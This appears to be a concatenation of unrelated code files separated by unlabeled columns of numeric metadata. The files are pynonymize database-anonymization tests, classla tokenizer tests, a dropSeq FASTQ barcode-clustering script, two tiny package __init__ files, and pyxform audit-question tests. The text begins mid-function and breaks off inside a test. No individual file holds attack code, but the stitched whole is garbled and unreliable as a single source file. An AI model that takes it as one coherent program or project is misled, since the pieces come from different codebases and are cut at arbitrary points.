    provider.anonymize_database.assert_not_called()
    provider.dump_database.assert_not_called()
    provider.drop_database.assert_not_called()
def test_optional_strategyfile_when_skip_anonymize(self, StrategyParser, FakeColumnSet,
                                                   get_provider, read_config):
    """With ANONYMIZE_DB skipped, a missing strategyfile must not raise."""
    db_kwargs = dict(
        db_type="TEST_TYPE",
        db_host="TEST_HOST",
        db_port="TEST_PORT",
        db_name="TEST_NAME",
        db_user="TEST_USER",
        db_password="TEST_PASSWORD",
    )
    pynonymize(
        input_path="TEST_INPUT",
        strategyfile_path=None,
        output_path="TEST_OUTPUT",
        fake_locale="TEST_LOCALE",
        start_at_step=None,
        stop_at_step=None,
        skip_steps=["ANONYMIZE_DB"],
        **db_kwargs,
    )
    get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
    provider = get_provider.return_value
    # Anonymize is the only step omitted.
    provider.create_database.assert_called()
    provider.restore_database.assert_called()
    provider.anonymize_database.assert_not_called()
    provider.dump_database.assert_called()
    provider.drop_database.assert_called()
def test_optional_strategyfile_when_start_at_after_anonymize(self, StrategyParser, FakeColumnSet,
                                                             get_provider, read_config):
    """Starting after ANONYMIZE_DB makes the strategyfile optional."""
    db_kwargs = dict(
        db_type="TEST_TYPE",
        db_host="TEST_HOST",
        db_port="TEST_PORT",
        db_name="TEST_NAME",
        db_user="TEST_USER",
        db_password="TEST_PASSWORD",
    )
    pynonymize(
        input_path="TEST_INPUT",
        strategyfile_path=None,
        output_path="TEST_OUTPUT",
        fake_locale="TEST_LOCALE",
        start_at_step="DUMP_DB",
        stop_at_step=None,
        skip_steps=None,
        **db_kwargs,
    )
    get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
    provider = get_provider.return_value
    # Only dump and drop fall at/after the start step.
    provider.create_database.assert_not_called()
    provider.restore_database.assert_not_called()
    provider.anonymize_database.assert_not_called()
    provider.dump_database.assert_called()
    provider.drop_database.assert_called()
def test_optional_strategyfile_when_stop_at_before_anonymize(self, StrategyParser, FakeColumnSet,
                                                             get_provider, read_config):
    """The strategyfile may be omitted when processing stops before ANONYMIZE_DB."""
    options = {
        "input_path": "TEST_INPUT",
        "strategyfile_path": None,
        "output_path": "TEST_OUTPUT",
        "db_type": "TEST_TYPE",
        "db_host": "TEST_HOST",
        "db_port": "TEST_PORT",
        "db_name": "TEST_NAME",
        "db_user": "TEST_USER",
        "db_password": "TEST_PASSWORD",
        "fake_locale": "TEST_LOCALE",
        "start_at_step": None,
        "stop_at_step": "RESTORE_DB",
        "skip_steps": None,
    }
    pynonymize(**options)
    get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
    provider = get_provider.return_value
    # Stopping at RESTORE_DB: only create and restore execute.
    provider.create_database.assert_called()
    provider.restore_database.assert_called()
    for skipped in ("anonymize_database", "dump_database", "drop_database"):
        getattr(provider, skipped).assert_not_called()
def test_optional_output_when_skip_output_steps(self, StrategyParser, FakeColumnSet,
                                                get_provider, read_config):
    """The output path may be omitted when the DUMP_DB step is skipped."""
    options = {
        "input_path": "TEST_INPUT",
        "strategyfile_path": "TEST_STRATEGYFILE",
        "output_path": None,
        "db_type": "TEST_TYPE",
        "db_host": "TEST_HOST",
        "db_port": "TEST_PORT",
        "db_name": "TEST_NAME",
        "db_user": "TEST_USER",
        "db_password": "TEST_PASSWORD",
        "fake_locale": "TEST_LOCALE",
        "start_at_step": None,
        "stop_at_step": None,
        "skip_steps": ["DUMP_DB"],
    }
    pynonymize(**options)
    StrategyParser.return_value.parse_config.assert_called()
    get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
    provider = get_provider.return_value
    # All steps except the dump should still run.
    for invoked in ("create_database", "restore_database", "anonymize_database", "drop_database"):
        getattr(provider, invoked).assert_called()
    provider.dump_database.assert_not_called()
def test_optional_output_when_start_at_after_output_steps(self, StrategyParser, FakeColumnSet,
                                                          get_provider, read_config):
    """The output path may be omitted when processing starts after DUMP_DB."""
    options = {
        "input_path": "TEST_INPUT",
        "strategyfile_path": "TEST_STRATEGYFILE",
        "output_path": None,
        "db_type": "TEST_TYPE",
        "db_host": "TEST_HOST",
        "db_port": "TEST_PORT",
        "db_name": "TEST_NAME",
        "db_user": "TEST_USER",
        "db_password": "TEST_PASSWORD",
        "fake_locale": "TEST_LOCALE",
        "start_at_step": "DROP_DB",
        "stop_at_step": None,
        "skip_steps": None,
    }
    pynonymize(**options)
    get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
    provider = get_provider.return_value
    # Starting at DROP_DB: only the drop step executes.
    for skipped in ("create_database", "restore_database", "anonymize_database", "dump_database"):
        getattr(provider, skipped).assert_not_called()
    provider.drop_database.assert_called()
def test_optional_output_when_stop_at_before_output_steps(self, StrategyParser, FakeColumnSet,
                                                          get_provider, read_config):
    """Output path is optional when the dump never happens.

    NOTE(review): despite the name, this exercises skip_steps=["DUMP_DB"]
    (stop_at_step is None) — identical to the skip test above; confirm intent.
    """
    options = {
        "input_path": "TEST_INPUT",
        "strategyfile_path": "TEST_STRATEGYFILE",
        "output_path": None,
        "db_type": "TEST_TYPE",
        "db_host": "TEST_HOST",
        "db_port": "TEST_PORT",
        "db_name": "TEST_NAME",
        "db_user": "TEST_USER",
        "db_password": "TEST_PASSWORD",
        "fake_locale": "TEST_LOCALE",
        "start_at_step": None,
        "stop_at_step": None,
        "skip_steps": ["DUMP_DB"],
    }
    pynonymize(**options)
    StrategyParser.return_value.parse_config.assert_called()
    get_provider.assert_called_with(type="TEST_TYPE", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150)
    provider = get_provider.return_value
    for invoked in ("create_database", "restore_database", "anonymize_database", "drop_database"):
        getattr(provider, invoked).assert_called()
    provider.dump_database.assert_not_called()
| 41.47486
| 219
| 0.650368
| 2,578
| 22,272
| 5.185415
| 0.071761
| 0.060144
| 0.056852
| 0.031418
| 0.851287
| 0.847098
| 0.840215
| 0.832436
| 0.826975
| 0.825479
| 0
| 0.005349
| 0.252963
| 22,272
| 536
| 220
| 41.552239
| 0.798113
| 0.038389
| 0
| 0.789709
| 0
| 0
| 0.174249
| 0.0256
| 0
| 0
| 0
| 0
| 0.221477
| 1
| 0.04698
| false
| 0.073826
| 0.013423
| 0
| 0.067114
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
e1519342f85347775bd32cc5b68349173ed0bc52
| 3,764
|
py
|
Python
|
tests_classla/test_tokenizer.py
|
clarinsi/classla-stanfordnlp
|
25fb417f6b4a2bc52c1bf89ee55eddbc256cbc19
|
[
"Apache-2.0"
] | 12
|
2019-11-25T14:51:21.000Z
|
2021-02-21T16:59:38.000Z
|
tests_classla/test_tokenizer.py
|
clarinsi/classla
|
229148f3942ff3428741f4004b7d6643b8a4dc45
|
[
"Apache-2.0"
] | 23
|
2021-03-12T13:17:17.000Z
|
2022-02-14T08:56:53.000Z
|
tests_classla/test_tokenizer.py
|
clarinsi/classla
|
229148f3942ff3428741f4004b7d6643b8a4dc45
|
[
"Apache-2.0"
] | 7
|
2021-04-04T15:04:27.000Z
|
2022-02-20T17:33:39.000Z
|
"""
Basic testing of tokenization
"""
import classla
from tests_classla import *
# Raw three-sentence Slovenian input for the plain-tokenization test.
SL_DOC = "France Prešeren je bil rojen v Vrbi. Danes je poznan kot največji slovenski pesnik. Študiral je na Dunaju."
# Expected token listing for SL_DOC: one <Token> per line, token ids restart
# at 1 for each sentence; sentences are compared joined with '\n\n'.
SL_DOC_GOLD_TOKENS = """
<Token id=1;words=[<Word id=1;text=France>]>
<Token id=2;words=[<Word id=2;text=Prešeren>]>
<Token id=3;words=[<Word id=3;text=je>]>
<Token id=4;words=[<Word id=4;text=bil>]>
<Token id=5;words=[<Word id=5;text=rojen>]>
<Token id=6;words=[<Word id=6;text=v>]>
<Token id=7;words=[<Word id=7;text=Vrbi>]>
<Token id=8;words=[<Word id=8;text=.>]>
<Token id=1;words=[<Word id=1;text=Danes>]>
<Token id=2;words=[<Word id=2;text=je>]>
<Token id=3;words=[<Word id=3;text=poznan>]>
<Token id=4;words=[<Word id=4;text=kot>]>
<Token id=5;words=[<Word id=5;text=največji>]>
<Token id=6;words=[<Word id=6;text=slovenski>]>
<Token id=7;words=[<Word id=7;text=pesnik>]>
<Token id=8;words=[<Word id=8;text=.>]>
<Token id=1;words=[<Word id=1;text=Študiral>]>
<Token id=2;words=[<Word id=2;text=je>]>
<Token id=3;words=[<Word id=3;text=na>]>
<Token id=4;words=[<Word id=4;text=Dunaju>]>
<Token id=5;words=[<Word id=5;text=.>]>
""".strip()
# Pretokenized input: tokens space-separated, sentences newline-separated.
# NOTE(review): the final "Dunaju.\n" keeps its period attached, and the gold
# tokens below expect the single token "Dunaju." — presumably intentional, to
# show pretokenized mode does no further splitting; confirm.
SL_DOC_PRETOKENIZED = \
    "France Prešeren je bil rojen v Vrbi .\nDanes je poznan kot največji slovenski pesnik .\n\nŠtudiral je na Dunaju.\n"
SL_DOC_PRETOKENIZED_GOLD_TOKENS = """
<Token id=1;words=[<Word id=1;text=France>]>
<Token id=2;words=[<Word id=2;text=Prešeren>]>
<Token id=3;words=[<Word id=3;text=je>]>
<Token id=4;words=[<Word id=4;text=bil>]>
<Token id=5;words=[<Word id=5;text=rojen>]>
<Token id=6;words=[<Word id=6;text=v>]>
<Token id=7;words=[<Word id=7;text=Vrbi>]>
<Token id=8;words=[<Word id=8;text=.>]>
<Token id=1;words=[<Word id=1;text=Danes>]>
<Token id=2;words=[<Word id=2;text=je>]>
<Token id=3;words=[<Word id=3;text=poznan>]>
<Token id=4;words=[<Word id=4;text=kot>]>
<Token id=5;words=[<Word id=5;text=največji>]>
<Token id=6;words=[<Word id=6;text=slovenski>]>
<Token id=7;words=[<Word id=7;text=pesnik>]>
<Token id=8;words=[<Word id=8;text=.>]>
<Token id=1;words=[<Word id=1;text=Študiral>]>
<Token id=2;words=[<Word id=2;text=je>]>
<Token id=3;words=[<Word id=3;text=na>]>
<Token id=4;words=[<Word id=4;text=Dunaju.>]>
""".strip()
# Pretokenized input given as a list of sentences, each a list of tokens.
SL_DOC_PRETOKENIZED_LIST = [['France', 'Prešeren', 'je', 'bil', 'rojen', 'v', 'Vrbi', '.'], ['Danes', 'živi', 'v',
                            'poeziji', '.']]
SL_DOC_PRETOKENIZED_LIST_GOLD_TOKENS = """
<Token id=1;words=[<Word id=1;text=France>]>
<Token id=2;words=[<Word id=2;text=Prešeren>]>
<Token id=3;words=[<Word id=3;text=je>]>
<Token id=4;words=[<Word id=4;text=bil>]>
<Token id=5;words=[<Word id=5;text=rojen>]>
<Token id=6;words=[<Word id=6;text=v>]>
<Token id=7;words=[<Word id=7;text=Vrbi>]>
<Token id=8;words=[<Word id=8;text=.>]>
<Token id=1;words=[<Word id=1;text=Danes>]>
<Token id=2;words=[<Word id=2;text=živi>]>
<Token id=3;words=[<Word id=3;text=v>]>
<Token id=4;words=[<Word id=4;text=poeziji>]>
<Token id=5;words=[<Word id=5;text=.>]>
""".strip()
def test_tokenize():
    """Tokenize raw Slovenian text and compare all sentences to the gold tokens."""
    pipeline = classla.Pipeline(processors='tokenize', dir=TEST_MODELS_DIR, lang='sl')
    document = pipeline(SL_DOC)
    rendered = '\n\n'.join(sentence.tokens_string() for sentence in document.sentences)
    assert rendered == SL_DOC_GOLD_TOKENS
def test_pretokenized():
    """Pretokenized mode: a newline-delimited string and a list-of-lists input
    must both reproduce their gold token listings unchanged."""
    pipeline = classla.Pipeline(**{'processors': 'tokenize', 'dir': TEST_MODELS_DIR,
                                   'lang': 'sl', 'tokenize_pretokenized': True})
    for source, gold in ((SL_DOC_PRETOKENIZED, SL_DOC_PRETOKENIZED_GOLD_TOKENS),
                         (SL_DOC_PRETOKENIZED_LIST, SL_DOC_PRETOKENIZED_LIST_GOLD_TOKENS)):
        document = pipeline(source)
        assert gold == '\n\n'.join(sentence.tokens_string() for sentence in document.sentences)
| 36.901961
| 120
| 0.64559
| 662
| 3,764
| 3.599698
| 0.099698
| 0.158624
| 0.249266
| 0.043642
| 0.882921
| 0.84935
| 0.803189
| 0.79102
| 0.742342
| 0.718003
| 0
| 0.032857
| 0.126727
| 3,764
| 101
| 121
| 37.267327
| 0.69212
| 0.007705
| 0
| 0.666667
| 0
| 0.025641
| 0.71854
| 0.056882
| 0
| 0
| 0
| 0
| 0.038462
| 1
| 0.025641
| false
| 0
| 0.025641
| 0
| 0.051282
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
beca77ca554c03b5eb7d500fa14347dd68771958
| 4,336
|
py
|
Python
|
src/script/filter_reads.py
|
guangyu-zhou/scRNA-Clustering
|
814360bdc596596f84dcf1b585d323dfcd7b97a6
|
[
"MIT"
] | 2
|
2019-07-07T05:30:13.000Z
|
2019-07-19T04:46:53.000Z
|
src/script/filter_reads.py
|
guangyu-zhou/scRNA-Clustering
|
814360bdc596596f84dcf1b585d323dfcd7b97a6
|
[
"MIT"
] | null | null | null |
src/script/filter_reads.py
|
guangyu-zhou/scRNA-Clustering
|
814360bdc596596f84dcf1b585d323dfcd7b97a6
|
[
"MIT"
] | 1
|
2018-08-31T11:32:44.000Z
|
2018-08-31T11:32:44.000Z
|
# awk -F" " '{print $1}' E31_REP1_HKT73BGX2_1.fastq | grep '^@' > E31_REP1_HKT73BGX2_all_reads.fastq
# diff --new-line-format="" --unchanged-line-format="" <(sort E31_REP1_HKT73BGX2_all_reads.fastq) <(sort E31_REP1_HKT73BGX2_reads_filtered.fastq) > E31_REP1_HKT73BGX2_removed.fastq
import matplotlib as mpl
mpl.use('Agg')
# import matplotlib.pyplot as plt
import numpy as np
import math
import pylab as plt
def process_individual():
    """Process one dropSeq replicate (E31_REP1_HKT73BGX2): drop low-quality
    reads, group the survivors by barcode, write singleton and multi-read
    clusters to separate files, and plot a histogram of multi-read cluster
    sizes.

    Side effects only: reads and writes files under `path` and saves a PNG.
    """
    path = '/home/zgy_ucla_cs/data/dropSeq/'

    # Read names previously flagged as low quality, one per line.
    low_qual_reads = set()
    with open(path + "E31_REP1_HKT73BGX2_removed.fastq") as infile0:
        for line in infile0:
            low_qual_reads.add(line.strip())
    print("done with low_qual_reads reading")

    # FASTQ records span 4 lines; line 1 of each record carries the read name,
    # line 2 the barcode sequence. Group read names by barcode, skipping
    # records whose name appears in the low-quality set.
    bar_read = {}
    with open(path + "E31_REP1_HKT73BGX2_1.fastq") as infile:
        count = 0
        readname = ''
        barcode = ''
        for line in infile:
            line = line.strip()
            count += 1
            if count % 1000000 == 0:
                print(count)  # progress indicator for very large files
            if count % 4 == 1:
                readname = line.split()[0]
            if count % 4 == 2:
                barcode = line
            if count % 4 == 3 and readname not in low_qual_reads:
                bar_read.setdefault(barcode, []).append(readname)
    print("Bar size", len(bar_read))

    # was: f1/f_other were opened but never closed (leak); now closed via with.
    with open(path + "E31_REP1_HKT73BGX2_cluster_1.fastq", 'w+') as f1, \
            open(path + "E31_REP1_HKT73BGX2_cluster_other.fastq", 'w+') as f_other:
        for key, reads in bar_read.items():
            target = f1 if len(reads) == 1 else f_other
            target.write(key + ' ' + ' '.join(reads) + '\n')

    print("start plotting histogram")
    # Only clusters with more than one read contribute to the histogram.
    read_cluster_size = [len(reads) for reads in bar_read.values() if len(reads) > 1]
    if not read_cluster_size:
        # min()/max() below would raise ValueError on an empty list.
        print("no multi-read clusters; skipping histogram")
        return
    bins = np.linspace(math.ceil(min(read_cluster_size)),
                       math.floor(max(read_cluster_size)),
                       100)  # fixed number of bins
    plt.hist(read_cluster_size, bins=bins)  # arguments are passed to np.histogram
    plt.title("Histogram with 100 bins, log scale")
    plt.gca().set_yscale("log")
    plt.savefig(path + "E31_REP1_HKT73BGX2_cluster_size.png")
def process_all():
    """Process all three dropSeq replicates together: drop low-quality reads,
    group surviving reads by barcode across replicates, write singleton and
    multi-read clusters to files, save the cluster-size array, and plot a
    histogram of cluster sizes.

    Side effects only: reads and writes files under `path`, saves .npy + PNG.
    """
    path = '/home/zgy_ucla_cs/data/dropSeq/'
    rep_names = ['E31_REP1_HKT73BGX2', 'E31_REP2_HHN7NBGX3', 'E31_REP3_HHNKFBGX3']

    # Union of low-quality read names across every replicate.
    low_qual_reads = set()
    for rep in rep_names:
        with open(path + rep + "_removed.fastq") as infile0:
            for line in infile0:
                low_qual_reads.add(line.strip())
    print("done with low_qual_reads reading", len(low_qual_reads))

    # FASTQ records span 4 lines; line 1 carries the read name, line 2 the
    # barcode. Group read names by barcode, skipping low-quality reads.
    bar_read = {}
    for rep in rep_names:
        with open(path + rep + "_1.fastq") as infile:
            print("processing", rep)
            count = 0
            readname = ''
            barcode = ''
            for line in infile:
                line = line.strip()
                count += 1
                if count % 1000000 == 0:
                    print(count)  # progress indicator
                if count % 4 == 1:
                    readname = line.split()[0]
                if count % 4 == 2:
                    barcode = line
                if count % 4 == 3 and readname not in low_qual_reads:
                    bar_read.setdefault(barcode, []).append(readname)
    print("Bar size", len(bar_read))

    # was: f1/f_other were opened but never closed (leak); now closed via with.
    with open(path + "All_cluster_1.fastq", 'w+') as f1, \
            open(path + "All_cluster_other.fastq", 'w+') as f_other:
        for key, reads in bar_read.items():
            target = f1 if len(reads) == 1 else f_other
            target.write(key + ' ' + ' '.join(reads) + '\n')

    print("start plotting histogram")
    # Unlike process_individual, every non-empty cluster is counted (> 0).
    read_cluster_size = [len(reads) for reads in bar_read.values() if len(reads) > 0]
    np.save(path + 'All_cluster_size', np.array(read_cluster_size))
    if not read_cluster_size:
        # min()/max() below would raise ValueError on an empty list.
        print("no clusters; skipping histogram")
        return
    bins = np.linspace(math.ceil(min(read_cluster_size)),
                       math.floor(max(read_cluster_size)),
                       500)  # fixed number of bins
    plt.hist(read_cluster_size, bins=bins)  # arguments are passed to np.histogram
    # was: "distritbuion" — typo fixed in the plot title.
    plt.title("Cluster size distribution, log scale")
    plt.gca().set_yscale("log")
    plt.savefig(path + "All_cluster_size.png")
# Guard the entry point so importing this module does not immediately kick
# off the full multi-replicate processing run.
if __name__ == "__main__":
    process_all()
| 27.794872
| 180
| 0.656365
| 646
| 4,336
| 4.195046
| 0.190402
| 0.069004
| 0.057565
| 0.0369
| 0.828782
| 0.785609
| 0.731734
| 0.731734
| 0.71107
| 0.688192
| 0
| 0.047841
| 0.20941
| 4,336
| 155
| 181
| 27.974194
| 0.742707
| 0.170664
| 0
| 0.733945
| 0
| 0
| 0.173669
| 0.070028
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018349
| false
| 0
| 0.036697
| 0
| 0.055046
| 0.082569
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83085e48c48b6419d461560cae266c776af59eea
| 37
|
py
|
Python
|
hello_world_python_package/__init__.py
|
jlimahaverford/hello_world_python_package
|
b1af625346dfa559fbecb04d9c1ccce0e16e01b6
|
[
"MIT"
] | null | null | null |
hello_world_python_package/__init__.py
|
jlimahaverford/hello_world_python_package
|
b1af625346dfa559fbecb04d9c1ccce0e16e01b6
|
[
"MIT"
] | null | null | null |
hello_world_python_package/__init__.py
|
jlimahaverford/hello_world_python_package
|
b1af625346dfa559fbecb04d9c1ccce0e16e01b6
|
[
"MIT"
] | null | null | null |
from .hello_world import hello_world
| 18.5
| 36
| 0.864865
| 6
| 37
| 5
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108108
| 37
| 1
| 37
| 37
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
832de6dbe6f915e3d9dfc6c0faf75499ce4676da
| 180
|
py
|
Python
|
swearjar/GUI/Tabs/__init__.py
|
CptJamesCook/SwearJar
|
9bc7a389242c4c21c5b021eb8df5d7529ca5d9a8
|
[
"MIT"
] | null | null | null |
swearjar/GUI/Tabs/__init__.py
|
CptJamesCook/SwearJar
|
9bc7a389242c4c21c5b021eb8df5d7529ca5d9a8
|
[
"MIT"
] | null | null | null |
swearjar/GUI/Tabs/__init__.py
|
CptJamesCook/SwearJar
|
9bc7a389242c4c21c5b021eb8df5d7529ca5d9a8
|
[
"MIT"
] | null | null | null |
"""Import all the tabs on import of module."""
from swearjar.GUI.Tabs.guiTab import GUITab
from swearjar.GUI.Tabs.tabEx1 import tabEx1
from swearjar.GUI.Tabs.tabEx2 import tabEx2
| 30
| 46
| 0.794444
| 29
| 180
| 4.931034
| 0.448276
| 0.251748
| 0.314685
| 0.398601
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025157
| 0.116667
| 180
| 5
| 47
| 36
| 0.874214
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
36b5f19f6e6f629dbab80da89c067ceebb6cc783
| 10,770
|
py
|
Python
|
tests/test_audit.py
|
ukanga/pyxform
|
f4ce2ec7f90d3e197b9b5b58fecccabe31d213f8
|
[
"BSD-2-Clause"
] | 67
|
2015-02-02T17:49:25.000Z
|
2022-02-18T06:31:52.000Z
|
tests/test_audit.py
|
ukanga/pyxform
|
f4ce2ec7f90d3e197b9b5b58fecccabe31d213f8
|
[
"BSD-2-Clause"
] | 477
|
2015-01-14T15:48:44.000Z
|
2022-03-29T16:37:22.000Z
|
tests/test_audit.py
|
ukanga/pyxform
|
f4ce2ec7f90d3e197b9b5b58fecccabe31d213f8
|
[
"BSD-2-Clause"
] | 86
|
2015-01-26T13:16:26.000Z
|
2022-01-20T21:40:54.000Z
|
# -*- coding: utf-8 -*-
"""
AuditTest - test audit question type.
"""
from tests.pyxform_test_case import PyxformTestCase
class AuditTest(PyxformTestCase):
    """
    AuditTest - test audit question type.
    """

    def test_audit(self):
        """An audit row named 'audit' yields an <audit/> node under <meta> with a binary bind."""
        self.assertPyxformXform(
            name="meta_audit",
            md="""
            | survey | | | |
            | | type | name | label |
            | | audit | audit | |
            """,
            xml__contains=[
                "<meta>",
                "<audit/>",
                "</meta>",
                '<bind nodeset="/meta_audit/meta/audit" type="binary"/>',
            ],
        )

    def test_audit_random_name(self):
        """Any name other than 'audit' is rejected with an error."""
        self.assertPyxformXform(
            name="meta_audit",
            md="""
            | survey | | | |
            | | type | name | label |
            | | audit | bobby | |
            """,
            errored=True,
            error__contains=["Audits must always be named 'audit.'"],
        )

    def test_audit_blank_name(self):
        """A blank name is accepted and behaves like 'audit'."""
        self.assertPyxformXform(
            name="meta_audit",
            md="""
            | survey | | | |
            | | type | name | label |
            | | audit | | |
            """,
            xml__contains=[
                "<meta>",
                "<audit/>",
                "</meta>",
                '<bind nodeset="/meta_audit/meta/audit" type="binary"/>',
            ],
        )

    def test_audit_blank_parameters(self):
        """An empty parameters column produces the plain binary bind."""
        self.assertPyxformXform(
            name="meta_audit",
            md="""
            | survey | | | | |
            | | type | name | label | parameters |
            | | audit | | | |
            """,
            xml__contains=[
                "<meta>",
                "<audit/>",
                "</meta>",
                '<bind nodeset="/meta_audit/meta/audit" type="binary"/>',
            ],
        )

    def test_audit_location_required_parameters(self):
        """All three location-* parameters must be supplied together."""
        self.assertPyxformXform(
            name="meta_audit",
            md="""
            | survey | | | |
            | | type | name | parameters |
            | | audit | audit | location-max-age=3, location-min-interval=1 |
            """,
            errored=True,
            error__contains=[
                "'location-priority', 'location-min-interval', and 'location-max-age' are required parameters"
            ],
        )

    def test_audit_location_priority_values(self):
        """location-priority only accepts the four documented accuracy levels."""
        self.assertPyxformXform(
            name="meta_audit",
            md="""
            | survey | | | |
            | | type | name | parameters |
            | | audit | audit | location-priority=foo, location-min-interval=1, location-max-age=2 |
            """,
            errored=True,
            error__contains=[
                "location-priority must be set to no-power, low-power, balanced, or high-accuracy"
            ],
        )

    def test_audit_location_max_age_gt_min_interval(self):
        """location-max-age must be >= location-min-interval."""
        self.assertPyxformXform(
            name="meta_audit",
            md="""
            | survey | | | |
            | | type | name | parameters |
            | | audit | audit | location-priority=balanced, location-min-interval=2, location-max-age=1 |
            """,
            errored=True,
            error__contains=[
                "location-max-age must be greater than or equal to location-min-interval"
            ],
        )

    def test_audit_location_min_interval_positive(self):
        """location-min-interval must be non-negative."""
        self.assertPyxformXform(
            name="meta_audit",
            md="""
            | survey | | | |
            | | type | name | parameters |
            | | audit | audit | location-priority=balanced, location-min-interval=-1, location-max-age=1 |
            """,
            errored=True,
            error__contains=[
                "location-min-interval must be greater than or equal to zero"
            ],
        )

    def test_audit_location(self):
        """Valid location parameters appear as odk:* attributes on the bind."""
        self.assertPyxformXform(
            name="meta_audit",
            md="""
            | survey | | | |
            | | type | name | parameters |
            | | audit | audit | location-priority=balanced, location-min-interval=60, location-max-age=300 |
            """,
            xml__contains=[
                "<meta>",
                "<audit/>",
                "</meta>",
                '<bind nodeset="/meta_audit/meta/audit" type="binary" odk:location-max-age="300" odk:location-min-interval="60" odk:location-priority="balanced"/>',
            ],
        )

    def test_audit_track_changes_true(self):
        """track-changes=true appears as odk:track-changes="true" on the bind."""
        self.assertPyxformXform(
            name="meta_audit",
            md="""
            | survey | | | |
            | | type | name | parameters |
            | | audit | audit | track-changes=true |
            """,
            xml__contains=[
                "<meta>",
                "<audit/>",
                "</meta>",
                '<bind nodeset="/meta_audit/meta/audit" type="binary" odk:track-changes="true"/>',
            ],
        )

    def test_audit_track_changes_false(self):
        """track-changes=false appears as odk:track-changes="false" on the bind."""
        self.assertPyxformXform(
            name="meta_audit",
            md="""
            | survey | | | |
            | | type | name | parameters |
            | | audit | audit | track-changes=false |
            """,
            xml__contains=[
                "<meta>",
                "<audit/>",
                "</meta>",
                '<bind nodeset="/meta_audit/meta/audit" type="binary" odk:track-changes="false"/>',
            ],
        )

    def test_audit_track_changes_foo(self):
        """track-changes only accepts true/false."""
        self.assertPyxformXform(
            name="meta_audit",
            md="""
            | survey | | | |
            | | type | name | parameters |
            | | audit | audit | track-changes=foo |
            """,
            errored=True,
            error__contains=["track-changes must be set to true or false"],
        )

    def test_audit_identify_user_foo(self):
        """identify-user only accepts true/false."""
        self.assertPyxformXform(
            name="meta_audit",
            md="""
            | survey | | | |
            | | type | name | parameters |
            | | audit | audit | identify-user=foo |
            """,
            errored=True,
            error__contains=["identify-user must be set to true or false"],
        )

    def test_audit_identify_user_true(self):
        """identify-user=true appears as odk:identify-user="true" on the bind."""
        self.assertPyxformXform(
            name="meta_audit",
            md="""
            | survey | | | |
            | | type | name | parameters |
            | | audit | audit | identify-user=true |
            """,
            xml__contains=[
                "<meta>",
                "<audit/>",
                "</meta>",
                '<bind nodeset="/meta_audit/meta/audit" type="binary" odk:identify-user="true"/>',
            ],
        )

    def test_audit_identify_user_false(self):
        """identify-user=false appears as odk:identify-user="false" on the bind."""
        self.assertPyxformXform(
            name="meta_audit",
            md="""
            | survey | | | |
            | | type | name | parameters |
            | | audit | audit | identify-user=false |
            """,
            xml__contains=[
                "<meta>",
                "<audit/>",
                "</meta>",
                '<bind nodeset="/meta_audit/meta/audit" type="binary" odk:identify-user="false"/>',
            ],
        )

    def test_audit_track_changes_reasons_foo(self):
        """track-changes-reasons only accepts on-form-edit."""
        self.assertPyxformXform(
            name="meta_audit",
            md="""
            | survey | | | |
            | | type | name | parameters |
            | | audit | audit | track-changes-reasons=foo |
            """,
            errored=True,
            error__contains=["track-changes-reasons must be set to on-form-edit"],
        )

    def test_audit_track_changes_reasons_on_form_edit(self):
        """track-changes-reasons=on-form-edit appears as an odk:* bind attribute."""
        self.assertPyxformXform(
            name="meta_audit",
            md="""
            | survey | | | |
            | | type | name | parameters |
